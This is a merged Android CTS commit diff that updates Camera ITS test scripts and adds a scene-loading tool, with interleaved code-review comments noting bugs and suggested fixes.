Merge "Merge "Add automotive feature to exclude feature of test case "Car Dock Test"." into marshmallow-cts-dev am: 418bf4efb7" into nougat-cts-dev
am: dd88145533
Change-Id: I9a2196d07393845d8a0460d284e04c18358d4216
diff --git a/OldCtsTestCaseList.mk b/OldCtsTestCaseList.mk
index 685d9a0..c54d283 100644
--- a/OldCtsTestCaseList.mk
+++ b/OldCtsTestCaseList.mk
@@ -15,9 +15,11 @@
cts_security_apps_list := \
CtsAppAccessData \
CtsAppWithData \
+ CtsDeclareNonRuntimePermissions \
CtsDocumentProvider \
CtsDocumentClient \
CtsEncryptionApp \
+ CtsEscalateToRuntimePermissions \
CtsExternalStorageApp \
CtsInstrumentationAppDiffCert \
CtsNetSecPolicyUsesCleartextTrafficFalse \
diff --git a/apps/CameraITS/build/envsetup.sh b/apps/CameraITS/build/envsetup.sh
index bcf294a..de50ad8 100644
--- a/apps/CameraITS/build/envsetup.sh
+++ b/apps/CameraITS/build/envsetup.sh
@@ -17,7 +17,7 @@
# and that the unit tests for the modules passed (indicating that the setup
# is correct).
-CAMERA_ITS_TOP=$PWD
+export CAMERA_ITS_TOP=$PWD
[[ "${BASH_SOURCE[0]}" != "${0}" ]] || \
{ echo ">> Script must be sourced with 'source $0'" >&2; exit 1; }
diff --git a/apps/CameraITS/pymodules/its/caps.py b/apps/CameraITS/pymodules/its/caps.py
index a33757d..d9270f7 100644
--- a/apps/CameraITS/pymodules/its/caps.py
+++ b/apps/CameraITS/pymodules/its/caps.py
@@ -394,6 +394,59 @@
"android.edge.availableEdgeModes") and mode \
in props["android.edge.availableEdgeModes"];
+
+def lens_calibrated(props):
+ """Returns whether lens position is calibrated or not.
+
+ android.lens.info.focusDistanceCalibration has 3 modes.
+ 0: Uncalibrated
+ 1: Approximate
+ 2: Calibrated
+
+ Args:
+ props: Camera properties objects.
+
+ Returns:
+ Boolean.
+ """
+ return props.has_key("android.lens.info.focusDistanceCalibration") and \
+ props["android.lens.info.focusDistanceCalibration"] == 2
+
+
+def lens_approx_calibrated(props):
+ """Returns whether lens position is calibrated or not.
+
+ android.lens.info.focusDistanceCalibration has 3 modes.
+ 0: Uncalibrated
+ 1: Approximate
+ 2: Calibrated
+
+ Args:
+ props: Camera properties objects.
+
+ Returns:
+ Boolean.
+ """
+ return props.has_key("android.lens.info.focusDistanceCalibration") and \
+ (props["android.lens.info.focusDistanceCalibration"] == 1 or
+ props["android.lens.info.focusDistanceCalibration"] == 2)
+
+
+def fixed_focus(props):
+ """Returns whether a device is fixed focus.
+
+ props[android.lens.info.minimumFocusDistance] == 0 is fixed focus
+
+ Args:
+ props: Camera properties objects.
+
+ Returns:
+ Boolean.
+ """
+ return props.has_key("android.lens.info.minimumFocusDistance") and \
+ props["android.lens.info.minimumFocusDistance"] == 0
+
+
class __UnitTest(unittest.TestCase):
"""Run a suite of unit tests on this module.
"""
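Review bot: The docstring of `lens_approx_calibrated` is copied unchanged from `lens_calibrated`, so it claims to report full calibration while the code also accepts mode 1 (Approximate). Its summary line should read `"""Returns whether lens position is at least approximately calibrated (mode 1 or 2)."""`. The `__UnitTest` class at the end of the hunk continues outside it.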
diff --git a/apps/CameraITS/pymodules/its/device.py b/apps/CameraITS/pymodules/its/device.py
index 692a62d..3b378cc 100644
--- a/apps/CameraITS/pymodules/its/device.py
+++ b/apps/CameraITS/pymodules/its/device.py
@@ -754,15 +754,24 @@
Return the device ID provided in the command line if it's connected. If no
device ID is provided in the command line and there is only one device
connected, return the device ID by parsing the result of "adb devices".
+ Also, if the environment variable ANDROID_SERIAL is set, use it as device
+ id. When both ANDROID_SERIAL and device argument present, device argument
+ takes priority.
Raise an exception if no device is connected; or the device ID provided in
the command line is not connected; or no device ID is provided in the
- command line and there are more than 1 device connected.
+ command line or environment variable and there are more than 1 device
+ connected.
Returns:
Device ID string.
"""
device_id = None
+
+ # Check if device id is set in env
+ if "ANDROID_SERIAL" in os.environ:
+ device_id = os.environ["ANDROID_SERIAL"]
+
for s in sys.argv[1:]:
if s[:7] == "device=" and len(s) > 7:
device_id = str(s[7:])
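Review bot: An `ANDROID_SERIAL` that is set but empty makes `device_id` the empty string rather than `None`, in the new block before the argv loop. The rest of the function lies outside this hunk, but if it treats `None` as "no ID supplied", an empty value would presumably skip the single-device fallback and be reported as an unconnected device. `device_id = os.environ.get("ANDROID_SERIAL") or None` avoids that.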
diff --git a/apps/CameraITS/pymodules/its/image.py b/apps/CameraITS/pymodules/its/image.py
index a5ac60b..f1539ba 100644
--- a/apps/CameraITS/pymodules/its/image.py
+++ b/apps/CameraITS/pymodules/its/image.py
@@ -18,7 +18,7 @@
import its.error
import pylab
import sys
-import Image
+from PIL import Image
import numpy
import math
import unittest
diff --git a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
index 8f4682a..df904aa 100644
--- a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
+++ b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
@@ -21,7 +21,6 @@
import matplotlib
import matplotlib.pyplot as plt
import math
-import Image
import time
import numpy as np
import scipy.stats
@@ -157,7 +156,7 @@
np.var(tile(hp, tile_size), axis=(0, 1)).flatten()
for (mean, var) in zip(means_tiled, vars_tiled):
- # Don't include the tile if it has samples that might
+ # Don't include the tile if it has samples that might
# be clipped.
if mean + 2*math.sqrt(var) < max_signal_level:
samples_e.append([mean, var])
@@ -175,7 +174,7 @@
samples.extend([(round(s), mean, var) for (mean, var) in samples_s])
# Add the linear fit to the plot for this sensitivity.
- plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
+ plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
label="Linear fit")
xmax = max([x for (x, _) in samples_s])*1.25
plt_s.set_xlim(xmin=0, xmax=xmax)
@@ -219,7 +218,7 @@
[A, B, C, D], _, _, _ = np.linalg.lstsq(a, b)
- # Plot the noise model components with the values predicted by the
+ # Plot the noise model components with the values predicted by the
# noise model.
S_model = A*sens + B
O_model = \
@@ -228,14 +227,14 @@
(fig, (plt_S, plt_O)) = plt.subplots(2, 1)
plt_S.set_title("Noise model")
plt_S.set_ylabel("S")
- plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
+ plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
label="Measured")
plt_S.loglog(sens, S_model, 'bx', basex=10, basey=10, label="Model")
plt_S.legend(loc=2)
plt_O.set_xlabel("ISO")
plt_O.set_ylabel("O")
- plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
+ plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
label="Measured")
plt_O.loglog(sens, O_model, 'bx', basex=10, basey=10, label="Model")
fig.savefig("%s.png" % (NAME))
@@ -246,7 +245,7 @@
dg = max(s/sens_max_analog, 1)
S = A*s + B
O = C*s*s + D*dg*dg
- plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
+ plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
label="Model")
plt_s.legend(loc=2)
diff --git a/apps/CameraITS/tests/scene0/test_metadata.py b/apps/CameraITS/tests/scene0/test_metadata.py
index 2914493..e5fbba5 100644
--- a/apps/CameraITS/tests/scene0/test_metadata.py
+++ b/apps/CameraITS/tests/scene0/test_metadata.py
@@ -12,11 +12,13 @@
# See the License for the specific language governing permissions and
# limitations under the License.
-import its.image
+import math
+
+import its.caps
import its.device
import its.objects
import its.target
-import its.caps
+
def main():
"""Test the validity of some metadata entries.
@@ -75,6 +77,34 @@
assert(not failed)
+ if not its.caps.legacy(props):
+ # Test: pixel_pitch, FOV, and hyperfocal distance are reasonable
+ fmts = props["android.scaler.streamConfigurationMap"]["availableStreamConfigurations"]
+ fmts = sorted(fmts, key=lambda k: k["width"]*k["height"], reverse=True)
+ sensor_size = props["android.sensor.info.physicalSize"]
+ pixel_pitch_h = (sensor_size["height"] / fmts[0]["height"] * 1E3)
+ pixel_pitch_w = (sensor_size["width"] / fmts[0]["width"] * 1E3)
+ print "Assert pixel_pitch WxH: %.2f um, %.2f um" % (pixel_pitch_w,
+ pixel_pitch_h)
+ assert 1.0 <= pixel_pitch_w <= 10
+ assert 1.0 <= pixel_pitch_h <= 10
+ assert 0.333 <= pixel_pitch_w/pixel_pitch_h <= 3.0
+
+ diag = math.sqrt(sensor_size["height"] ** 2 +
+ sensor_size["width"] ** 2)
+ fl = md["android.lens.focalLength"]
+ fov = 2 * math.degrees(math.atan(diag / (2 * fl)))
+ print "Assert field of view: %.1f degrees" % fov
+ assert 30 <= fov <= 130
+
+ if its.caps.lens_approx_calibrated(props):
+ diopter_hyperfocal = props["android.lens.info.hyperfocalDistance"]
+ if diopter_hyperfocal != 0.0:
+ hyperfocal = 1.0 / diopter_hyperfocal
+ print "Assert hyperfocal distance: %.2f m" % hyperfocal
+ assert 0.02 <= hyperfocal
+
+
def getval(expr, default=None):
try:
return eval(expr)
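Review bot: `fov` divides by `2 * fl` with no check on `fl`, so a capture result reporting `android.lens.focalLength` as 0 ends in a ZeroDivisionError instead of a readable failure, and `fmts[0]` raises IndexError when the stream configuration list is empty. Adding `assert fmts` after the sort and `assert fl > 0` before the `atan` line would keep these failures in the same form as the surrounding range checks. `fmts` is sorted over every entry of `availableStreamConfigurations`, so the pixel pitch comes from the largest size of any listed format; a one-line comment saying that is intended would help. `main()` starts before this hunk.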
@@ -82,6 +112,8 @@
return default
failed = False
+
+
def check(expr):
global md, props, failed
try:
diff --git a/apps/CameraITS/tests/scene1/scene1.pdf b/apps/CameraITS/tests/scene1/scene1.pdf
new file mode 100644
index 0000000..7e47bcf
--- /dev/null
+++ b/apps/CameraITS/tests/scene1/scene1.pdf
Binary files differ
diff --git a/apps/CameraITS/tests/scene1/test_capture_result.py b/apps/CameraITS/tests/scene1/test_capture_result.py
index ec919f8..cde37c2 100644
--- a/apps/CameraITS/tests/scene1/test_capture_result.py
+++ b/apps/CameraITS/tests/scene1/test_capture_result.py
@@ -77,11 +77,11 @@
h_map = props["android.lens.info.shadingMapSize"]["height"]
print "Testing auto capture results"
- lsc_map_auto = test_auto(cam, w_map, h_map)
+ lsc_map_auto = test_auto(cam, w_map, h_map, props)
print "Testing manual capture results"
- test_manual(cam, w_map, h_map, lsc_map_auto)
+ test_manual(cam, w_map, h_map, lsc_map_auto, props)
print "Testing auto capture results again"
- test_auto(cam, w_map, h_map)
+ test_auto(cam, w_map, h_map, props)
# A very loose definition for two floats being close to each other;
# there may be different interpolation and rounding used to get the
@@ -105,7 +105,7 @@
ax.plot_wireframe(xs, ys, zs)
matplotlib.pyplot.savefig("%s_plot_lsc_%s_ch%d.png"%(NAME,name,ch))
-def test_auto(cam, w_map, h_map):
+def test_auto(cam, w_map, h_map, props):
# Get 3A lock first, so the auto values in the capture result are
# populated properly.
rect = [[0,0,1,1,1]]
@@ -124,9 +124,12 @@
print "Gains:", gains
print "Transform:", [its.objects.rational_to_float(t)
for t in transform]
- print "AE region:", cap_res['android.control.aeRegions']
- print "AF region:", cap_res['android.control.afRegions']
- print "AWB region:", cap_res['android.control.awbRegions']
+ if props["android.control.maxRegionsAe"] > 0:
+ print "AE region:", cap_res['android.control.aeRegions']
+ if props["android.control.maxRegionsAf"] > 0:
+ print "AF region:", cap_res['android.control.afRegions']
+ if props["android.control.maxRegionsAwb"] > 0:
+ print "AWB region:", cap_res['android.control.awbRegions']
print "LSC map:", w_map, h_map, lsc_map[:8]
assert(ctrl_mode == 1)
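Review bot: The three `maxRegions*` guards added to `test_auto` are repeated verbatim in the `test_manual` hunk further down, and a key missing from `props` would raise KeyError in either copy. A small module-level helper called from both places keeps them in sync and treats an absent key as zero regions. Both functions extend beyond their hunks.

```python
def print_3a_regions(props, cap_res):
    """Print the AE/AF/AWB regions the camera reports support for."""
    for name in ("Ae", "Af", "Awb"):
        if props.get("android.control.maxRegions" + name, 0) > 0:
            print "%s region:" % name.upper(), \
                    cap_res["android.control.%sRegions" % name.lower()]
```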
@@ -154,7 +157,7 @@
return lsc_map
-def test_manual(cam, w_map, h_map, lsc_map_auto):
+def test_manual(cam, w_map, h_map, lsc_map_auto, props):
cap = cam.do_capture(manual_req)
cap_res = cap["metadata"]
@@ -172,9 +175,12 @@
print "Transform:", [its.objects.rational_to_float(t)
for t in transform]
print "Tonemap:", curves[0][1::16]
- print "AE region:", cap_res['android.control.aeRegions']
- print "AF region:", cap_res['android.control.afRegions']
- print "AWB region:", cap_res['android.control.awbRegions']
+ if props["android.control.maxRegionsAe"] > 0:
+ print "AE region:", cap_res['android.control.aeRegions']
+ if props["android.control.maxRegionsAf"] > 0:
+ print "AF region:", cap_res['android.control.afRegions']
+ if props["android.control.maxRegionsAwb"] > 0:
+ print "AWB region:", cap_res['android.control.awbRegions']
print "LSC map:", w_map, h_map, lsc_map[:8]
assert(ctrl_mode == 0)
diff --git a/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py b/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
index 49ccbcf..a05a254 100644
--- a/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
+++ b/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
@@ -23,7 +23,11 @@
import numpy
#AE must converge within this number of auto requests for EV
-THREASH_CONVERGE_FOR_EV = 8
+THRESH_CONVERGE_FOR_EV = 8
+YUV_FULL_SCALE = 255.0
+YUV_SATURATION_MIN = 253.0
+YUV_SATURATION_TOL = 1.0
+
def main():
"""Tests that EV compensation is applied.
@@ -66,9 +70,19 @@
pylab.plot(evs, lumas, 'r')
matplotlib.pyplot.savefig("%s_plot_means.png" % (NAME))
- # trim trailing 1.0s (for saturated image)
- while lumas and lumas[-1] == 1.0:
- lumas.pop(-1)
+ # Trim extra saturated images
+ while lumas and lumas[-1] >= YUV_SATURATION_MIN/YUV_FULL_SCALE:
+ if (np.isclose(reds[-1], greens[-1],
+ YUV_SATURATION_TOL/YUV_FULL_SCALE) and
+ np.isclose(blues[-1], greens[-1],
+ YUV_SATURATION_TOL/YUV_FULL_SCALE)):
+ lumas.pop(-1)
+ reds.pop(-1)
+ greens.pop(-1)
+ blues.pop(-1)
+ print 'Removed saturated image.'
+ else:
+ break
# Only allow positive EVs to give saturated image
assert(len(lumas) > 2)
luma_diffs = numpy.diff(lumas)
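Review bot: The new trimming loop calls `np.isclose`, but the import and the `numpy.diff` call visible in this file's hunks use the name `numpy`; unless `np` is bound somewhere outside the hunks, the first saturated frame raises NameError. Use `numpy.isclose(...)` instead. The third positional argument of `isclose` is the relative tolerance, so `YUV_SATURATION_TOL/YUV_FULL_SCALE` should be passed as `atol=` if an absolute tolerance of one code value is meant. `reds`, `greens` and `blues` are defined outside this hunk.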
diff --git a/apps/CameraITS/tests/scene2/scene2.pdf b/apps/CameraITS/tests/scene2/scene2.pdf
new file mode 100644
index 0000000..ccde9d98
--- /dev/null
+++ b/apps/CameraITS/tests/scene2/scene2.pdf
Binary files differ
diff --git a/apps/CameraITS/tests/scene2/test_faces.py b/apps/CameraITS/tests/scene2/test_faces.py
index cce74e7..388a7e0 100644
--- a/apps/CameraITS/tests/scene2/test_faces.py
+++ b/apps/CameraITS/tests/scene2/test_faces.py
@@ -13,6 +13,7 @@
# limitations under the License.
import its.image
+import its.caps
import its.device
import its.objects
import os.path
@@ -31,16 +32,38 @@
fd_modes = props['android.statistics.info.availableFaceDetectModes']
a = props['android.sensor.info.activeArraySize']
aw, ah = a['right'] - a['left'], a['bottom'] - a['top']
- cam.do_3a()
+ if its.caps.read_3a(props):
+ gain, exp, _, _, focus = cam.do_3a(get_results=True)
+ print 'iso = %d' % gain
+ print 'exp = %.2fms' % (exp*1.0E-6)
+ if focus == 0.0:
+ print 'fd = infinity'
+ else:
+ print 'fd = %.2fcm' % (1.0E2/focus)
for fd_mode in fd_modes:
assert(FD_MODE_OFF <= fd_mode <= FD_MODE_FULL)
req = its.objects.auto_capture_request()
req['android.statistics.faceDetectMode'] = fd_mode
- caps = cam.do_capture([req]*NUM_TEST_FRAMES)
+ max_img_size = its.objects.get_available_output_sizes("yuv", props)[0]
+ w = max_img_size[0]
+ h = max_img_size[1]
+ out_surf=None
+ if w * h > 12 * 1024 * 1024:
+ size_to_use = its.objects.get_available_output_sizes("yuv",
+ props, max_size=(4000, 3000), match_ar_size=(w, h))[0]
+ out_surf = {
+ "width": size_to_use[0],
+ "height": size_to_use[1],
+ "format": "yuv",
+ }
+ caps = cam.do_capture([req]*NUM_TEST_FRAMES, out_surfaces=out_surf)
for i,cap in enumerate(caps):
md = cap['metadata']
assert(md['android.statistics.faceDetectMode'] == fd_mode)
faces = md['android.statistics.faces']
+ img = its.image.convert_capture_to_rgb_image(cap, props=props)
+ img_name = "%s_fd_mode_%s.jpg" % (NAME, fd_mode)
+ its.image.write_image(img, img_name)
# 0 faces should be returned for OFF mode
if fd_mode == FD_MODE_OFF:
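Review bot: `img_name` is built from `NAME` and `fd_mode` only, inside the `for i,cap in enumerate(caps)` loop, so each of the `NUM_TEST_FRAMES` captures is converted and written to the same file and only the last one survives. Either add the frame index, `img_name = "%s_fd_mode_%s_%d.jpg" % (NAME, fd_mode, i)`, or convert and write a single frame outside the loop. The `12 * 1024 * 1024` limit and the `(4000, 3000)` cap would read better as named constants with a comment on why large outputs are downsized. The loop body continues outside the hunk.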
diff --git a/apps/CameraITS/tests/scene3/scene3.pdf b/apps/CameraITS/tests/scene3/scene3.pdf
new file mode 100644
index 0000000..4c787b1
--- /dev/null
+++ b/apps/CameraITS/tests/scene3/scene3.pdf
Binary files differ
diff --git a/apps/CameraITS/tests/scene4/scene4.pdf b/apps/CameraITS/tests/scene4/scene4.pdf
new file mode 100644
index 0000000..7dcc4b9
--- /dev/null
+++ b/apps/CameraITS/tests/scene4/scene4.pdf
Binary files differ
diff --git a/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py b/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
index a26889b..065f854 100644
--- a/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
+++ b/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
@@ -52,16 +52,16 @@
with its.device.ItsSession() as cam:
props = cam.get_camera_properties()
- its.caps.skip_unless(its.caps.read_3a(props))
- # Converge 3A and get the estimates.
- sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
- do_af=False,
- lock_ae=True,
- lock_awb=True)
- print "AE sensitivity %d, exposure %dms" % (sens, exp / 1000000.0)
- print "AWB gains", gains
- print "AWB transform", xform
- print "AF distance", focus
+ if its.caps.read_3a(props):
+ # Converge 3A and get the estimates.
+ sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
+ do_af=False,
+ lock_ae=True,
+ lock_awb=True)
+ print "AE sensitivity %d, exposure %dms" % (sens, exp / 1000000.0)
+ print "AWB gains", gains
+ print "AWB transform", xform
+ print "AF distance", focus
req = its.objects.auto_capture_request()
img_size = its.objects.get_available_output_sizes("yuv", props)
w = img_size[0][0]
diff --git a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
index c4f9b84..bbd1417 100644
--- a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
+++ b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
@@ -23,7 +23,7 @@
import matplotlib
import matplotlib.pyplot
import json
-import Image
+from PIL import Image
import numpy
import cv2
import bisect
@@ -35,8 +35,20 @@
# Capture 210 VGA frames (which is 7s at 30fps)
N = 210
W,H = 640,480
+FEATURE_MARGIN = H * 0.20 / 2 # Only take feature points from the center 20%
+ # so that the rotation measured have much less
+ # of rolling shutter effect
-FEATURE_PARAMS = dict( maxCorners = 80,
+MIN_FEATURE_PTS = 30 # Minimum number of feature points required to
+ # perform rotation analysis
+
+MAX_CAM_FRM_RANGE_SEC = 9.0 # Maximum allowed camera frame range. When this
+ # number is significantly larger than 7 seconds,
+ # usually system is in some busy/bad states.
+
+MIN_GYRO_SMP_RATE = 100.0 # Minimum gyro sample rate
+
+FEATURE_PARAMS = dict( maxCorners = 240,
qualityLevel = 0.3,
minDistance = 7,
blockSize = 7 )
@@ -102,6 +114,14 @@
min_cam_time, max_cam_time, min_gyro_time, max_gyro_time)
assert(0)
+ cam_frame_range = max_cam_time - min_cam_time
+ gyro_time_range = max_gyro_time - min_gyro_time
+ gyro_smp_per_sec = len(gyro_times) / gyro_time_range
+ print "Camera frame range", max_cam_time - min_cam_time
+ print "Gyro samples per second", gyro_smp_per_sec
+ assert(cam_frame_range < MAX_CAM_FRM_RANGE_SEC)
+ assert(gyro_smp_per_sec > MIN_GYRO_SMP_RATE)
+
# Compute the camera rotation displacements (rad) between each pair of
# adjacent frames.
cam_rots = get_cam_rotations(frames, events["facing"])
@@ -140,9 +160,9 @@
Returns:
Offset (seconds) of the best alignment.
"""
- # Measure the corr. dist. over a shift of up to +/- 100ms (1ms step size).
+ # Measure the corr. dist. over a shift of up to +/- 50ms (0.5ms step size).
# Get the shift corresponding to the best (lowest) score.
- candidates = range(-100,101)
+ candidates = numpy.arange(-50,50.5,0.5).tolist()
dists = []
for shift in candidates:
times = cam_times + shift*MSEC_TO_NSEC
@@ -151,22 +171,26 @@
best_corr_dist = min(dists)
best_shift = candidates[dists.index(best_corr_dist)]
+ print "Best shift without fitting is ", best_shift, "ms"
+
# Fit a curve to the corr. dist. data to measure the minima more
# accurately, by looking at the correlation distances within a range of
- # +/- 20ms from the measured best score; note that this will use fewer
- # than the full +/- 20 range for the curve fit if the measured score
- # (which is used as the center of the fit) is within 20ms of the edge of
- # the +/- 100ms candidate range.
- i = len(dists)/2 + best_shift
+ # +/- 10ms from the measured best score; note that this will use fewer
+ # than the full +/- 10 range for the curve fit if the measured score
+ # (which is used as the center of the fit) is within 10ms of the edge of
+ # the +/- 50ms candidate range.
+ i = dists.index(best_corr_dist)
candidates = candidates[i-20:i+21]
dists = dists[i-20:i+21]
a,b,c = numpy.polyfit(candidates, dists, 2)
exact_best_shift = -b/(2*a)
if abs(best_shift - exact_best_shift) > 2.0 or a <= 0 or c <= 0:
print "Test failed; bad fit to time-shift curve"
+ print "best_shift %f, exact_best_shift %f, a %f, c %f" % (best_shift,
+ exact_best_shift, a, c)
assert(0)
- xfit = [x/10.0 for x in xrange(candidates[0]*10,candidates[-1]*10)]
+ xfit = numpy.arange(candidates[0], candidates[-1], 0.05).tolist()
yfit = [a*x*x+b*x+c for x in xfit]
fig = matplotlib.pyplot.figure()
pylab.plot(candidates, dists, 'r', label="data")
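Review bot: `candidates[i-20:i+21]` does not shrink the window near the lower edge as the comment says: when `i` is below 20 the start index is negative, Python counts it from the end of the list, and the slice comes back empty, so `numpy.polyfit` fails instead of fitting a shorter range. Clamp the start with `lo = max(0, i-20)` and slice `candidates[lo:i+21]` and `dists[lo:i+21]`. The window is ±20 samples, which equals ±10ms only because the step is 0.5ms; deriving the 20 from the step size would keep the comment and the code tied together.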
@@ -263,13 +287,23 @@
frame = (frame * 255.0).astype(numpy.uint8)
gframes.append(cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY))
rots = []
+ ymin = H/2 - FEATURE_MARGIN
+ ymax = H/2 + FEATURE_MARGIN
for i in range(1,len(gframes)):
gframe0 = gframes[i-1]
gframe1 = gframes[i]
p0 = cv2.goodFeaturesToTrack(gframe0, mask=None, **FEATURE_PARAMS)
- p1,st,_ = cv2.calcOpticalFlowPyrLK(gframe0, gframe1, p0, None,
+ # p0's shape is N * 1 * 2
+ mask = (p0[:,0,1] >= ymin) & (p0[:,0,1] <= ymax)
+ p0_filtered = p0[mask]
+ if len(p0_filtered) < MIN_FEATURE_PTS:
+ print "Not enough feature points in frame", i
+ print "Need at least %d features, got %d" % (
+ MIN_FEATURE_PTS, len(p0_filtered))
+ assert(0)
+ p1,st,_ = cv2.calcOpticalFlowPyrLK(gframe0, gframe1, p0_filtered, None,
**LK_PARAMS)
- tform = procrustes_rotation(p0[st==1], p1[st==1])
+ tform = procrustes_rotation(p0_filtered[st==1], p1[st==1])
if facing == FACING_BACK:
rot = -math.atan2(tform[0, 1], tform[0, 0])
elif facing == FACING_FRONT:
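Review bot: `cv2.goodFeaturesToTrack` can return `None` when it finds no corners, and the new `p0[:,0,1]` mask line then raises TypeError before the `MIN_FEATURE_PTS` diagnostic is reached. Handle `p0 is None` before building the mask and route it to the same "Not enough feature points" failure. The row filter is applied to the points of the earlier frame only, which deserves a short comment next to the `# p0's shape is N * 1 * 2` line. The loop continues outside the hunk.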
@@ -282,7 +316,7 @@
# Save a debug visualization of the features that are being
# tracked in the first frame.
frame = frames[i]
- for x,y in p0[st==1]:
+ for x,y in p0_filtered[st==1]:
cv2.circle(frame, (x,y), 3, (100,100,255), -1)
its.image.write_image(frame, "%s_features.png"%(NAME))
return numpy.array(rots)
@@ -342,8 +376,8 @@
print "Starting sensor event collection"
cam.start_sensor_events()
- # Sleep a few seconds for gyro events to stabilize.
- time.sleep(2)
+ # Sleep a while for gyro events to stabilize.
+ time.sleep(0.5)
# TODO: Ensure that OIS is disabled; set to DISABLE and wait some time.
@@ -354,7 +388,7 @@
assert(0)
fmt = {"format":"yuv", "width":W, "height":H}
- s,e,_,_,_ = cam.do_3a(get_results=True)
+ s,e,_,_,_ = cam.do_3a(get_results=True, do_af=False)
req = its.objects.manual_capture_request(s, e)
print "Capturing %dx%d with sens. %d, exp. time %.1fms" % (
W, H, s, e*NSEC_TO_MSEC)
@@ -363,6 +397,7 @@
# Get the gyro events.
print "Reading out sensor events"
gyro = cam.get_sensor_events()["gyro"]
+ print "Number of gyro samples", len(gyro)
# Combine the events into a single structure.
print "Dumping event data"
diff --git a/apps/CameraITS/tools/load_scene.py b/apps/CameraITS/tools/load_scene.py
new file mode 100644
index 0000000..4e245f4
--- /dev/null
+++ b/apps/CameraITS/tools/load_scene.py
@@ -0,0 +1,61 @@
+# Copyright 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import os
+import re
+import subprocess
+import sys
+import time
+
+
+def main():
+ """Load charts on device and display."""
+ camera_id = -1
+ scene = None
+ for s in sys.argv[1:]:
+ if s[:6] == 'scene=' and len(s) > 6:
+ scene = s[6:]
+ elif s[:7] == 'screen=' and len(s) > 7:
+ screen_id = s[7:]
+
+ cmd = ('adb -s %s shell am force-stop com.google.android.apps.docs' %
+ screen_id)
+ subprocess.Popen(cmd.split())
+
+ if not scene:
+ print 'Error: need to specify which scene to load'
+ assert False
+
+ if not screen_id:
+ print 'Error: need to specify screen serial'
+ assert False
+
+ remote_scene_file = '/sdcard/Download/%s.pdf' % scene
+ local_scene_file = os.path.join(os.environ['CAMERA_ITS_TOP'], 'tests',
+ scene, scene+'.pdf')
+ print 'Loading %s on %s' % (remote_scene_file, screen_id)
+ cmd = 'adb -s %s push %s /mnt%s' % (screen_id, local_scene_file,
+ remote_scene_file)
+ subprocess.Popen(cmd.split())
+ time.sleep(1) # wait-for-device doesn't always seem to work...
+ # The intent require PDF viewing app be installed on device.
+ # Also the first time such app is opened it might request some permission,
+ # so it's better to grant those permissions before using this script
+ cmd = ("adb -s %s wait-for-device shell am start -d 'file://%s'"
+ " -a android.intent.action.VIEW" % (screen_id,
+ remote_scene_file))
+ subprocess.Popen(cmd.split())
+
+if __name__ == '__main__':
+ main()
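Review bot: `screen_id` is never initialised, so running without a `screen=` argument raises NameError at the `force-stop` line, which also runs before either argument has been validated. `scene` is taken from argv and interpolated into a string that is split on whitespace and, for `am start`, parsed again by the device shell, so it should be restricted to a plain name first. The adb calls use `subprocess.Popen` without waiting, which means failures are ignored and the script exits 0 regardless; turn_off_screen.py and wake_up_screen.py in this commit follow the same pattern. Validate first, pass argument lists, and use `subprocess.check_call`, as sketched below; `camera_id` is unused and can go.

```python
def main():
    """Load charts on device and display."""
    scene = None
    screen_id = None
    # … unchanged: argv loop parsing scene= and screen= …

    # Validate before any adb call; both values end up on an adb command line.
    if not scene or not re.match(r'^\w+$', scene):
        print 'Error: need to specify which scene to load'
        sys.exit(1)
    if not screen_id:
        print 'Error: need to specify screen serial'
        sys.exit(1)

    adb = ['adb', '-s', screen_id]
    subprocess.check_call(adb + ['shell', 'am', 'force-stop',
                                 'com.google.android.apps.docs'])
    # … unchanged: remote_scene_file / local_scene_file …
    subprocess.check_call(adb + ['push', local_scene_file,
                                 '/mnt' + remote_scene_file])
    subprocess.check_call(adb + ['wait-for-device', 'shell', 'am', 'start',
                                 '-d', 'file://' + remote_scene_file,
                                 '-a', 'android.intent.action.VIEW'])
```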
diff --git a/apps/CameraITS/tools/run_all_tests.py b/apps/CameraITS/tools/run_all_tests.py
index 678c35c..c6ff548 100644
--- a/apps/CameraITS/tools/run_all_tests.py
+++ b/apps/CameraITS/tools/run_all_tests.py
@@ -34,6 +34,11 @@
scenes: the test scene(s) to be executed. Use comma to separate multiple
scenes. Ex: "scenes=scene0,scene1" or "scenes=0,1,sensor_fusion"
(sceneX can be abbreviated by X where X is a integer)
+ chart: [Experimental] another android device served as test chart
+ display. When this argument presents, change of test scene will
+ be handled automatically. Note that this argument requires
+ special physical/hardware setup to work and may not work on
+ all android devices.
"""
SKIP_RET_CODE = 101
@@ -59,6 +64,8 @@
all_scenes = ["scene0", "scene1", "scene2", "scene3", "scene4", "scene5"]
+ auto_scenes = ["scene0", "scene1", "scene2", "scene3", "scene4"]
